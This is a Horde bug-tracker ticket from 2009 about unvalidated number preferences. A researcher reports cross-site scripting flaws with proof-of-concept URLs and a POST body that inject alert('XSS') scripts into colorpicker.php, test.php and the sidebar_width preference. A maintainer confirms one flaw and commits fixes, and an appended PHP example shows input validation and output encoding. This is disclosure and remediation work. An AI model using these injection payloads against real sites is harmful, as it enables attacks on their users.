5.2.0-git
04/17/2014

[#8399] Number preferences are not validated properly
Summary: Number preferences are not validated properly
Queue: Horde Base
Queue Version: HEAD
Type: Bug
State: Resolved
Priority: 2. Medium
Owners: chuck (at) horde (dot) org
Requester: security (at) davidwharton (dot) us
Created: 07/03/2009 (1749 days ago)
Due:
Updated: 07/11/2009 (1741 days ago)
Assigned: 07/11/2009 (1741 days ago)
Resolved: 07/11/2009 (1741 days ago)
Milestone: 3.3.5
Patch: No

History
07/11/2009 11:40:05 PM Chuck Hagenbuch Comment #4
Taken from Horde Developers
State ⇒ Resolved
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).
07/11/2009 09:08:06 PM Chuck Hagenbuch Comment #2
Milestone ⇒ 3.3.5
Version ⇒ HEAD
State ⇒ Assigned
Summary ⇒ Number preferences are not validated properly
Assigned to Horde Developers
Assigned to Chuck Hagenbuch
> Multiple cross site scripting vulnerabilities exist.  Proof of concepts:

Horde 3.1 has been deprecated for a long time. The current stable
version is 3.3, and we backport serious security fixes to 3.2.

> http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
> https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["

This file doesn't exist in 3.2 or later.

This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9

> POST to http://hordeserver.com/horde/services/prefs.php with the
> following content:
> actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on

This I can actually reproduce as a problem. Patch forthcoming.
07/03/2009 06:48:49 PM security (at) davidwharton (dot) us Comment #1
State ⇒ Unconfirmed
Patch ⇒ No
Milestone ⇒
Queue ⇒ Horde Base
Summary ⇒ Multiple Cross Site Scripting Vulnerabilities
Type ⇒ Bug
Priority ⇒ 2. Medium
Multiple cross site scripting vulnerabilities exist.  Proof of concepts:

http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>

https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["

https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>

POST to http://hordeserver.com/horde/services/prefs.php with the
following content:

actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on
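
The check the ticket title calls for, as an added example that is not part of the ticket thread and is not Horde's committed fix: a value submitted for a preference of type number is stored only if it is a plain integer in range, and is encoded again when written into the page. The function names, the bounds and the array standing in for the preference backend are assumptions made for illustration.

```php
<?php
// Added example (not Horde's code). Assumes PHP 7.1+.

/**
 * Return a submitted number preference as an int, or null when the raw
 * string is not a plain decimal integer within [$min, $max].
 * The default bounds are hypothetical; set them per preference.
 */
function validate_number_pref(string $raw, int $min = 0, int $max = 100000): ?int
{
    // Digits only, optional leading minus. \z anchors at the true end of
    // input, so a trailing newline is rejected; 9 digits cannot overflow.
    if (!preg_match('/\A-?[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    $value = (int) $raw;
    return ($value >= $min && $value <= $max) ? $value : null;
}

/**
 * Store the preference only when it validates; otherwise keep the old value.
 * $prefs is a plain array standing in for the preference backend.
 */
function update_number_pref(array $prefs, string $name, string $raw): array
{
    $value = validate_number_pref($raw);
    if ($value !== null) {
        $prefs[$name] = $value;
    }
    return $prefs;
}

// Constructed input modelled on the sidebar_width value in the report.
$reported = "1337//-->\r%<script>alert('XSS')</script>//";
$prefs = ['sidebar_width' => 150];

// Fails validation, so the stored width is left as it was.
$prefs = update_number_pref($prefs, 'sidebar_width', $reported);
var_dump($prefs['sidebar_width']);

// A plain integer is accepted and stored as an int.
$prefs = update_number_pref($prefs, 'sidebar_width', '200');
var_dump($prefs['sidebar_width']);

// Encode on output as well, so a value stored before the check cannot break out.
$width = htmlspecialchars((string) $prefs['sidebar_width'], ENT_QUOTES, 'UTF-8');
echo "<td width=\"{$width}\">\n";
```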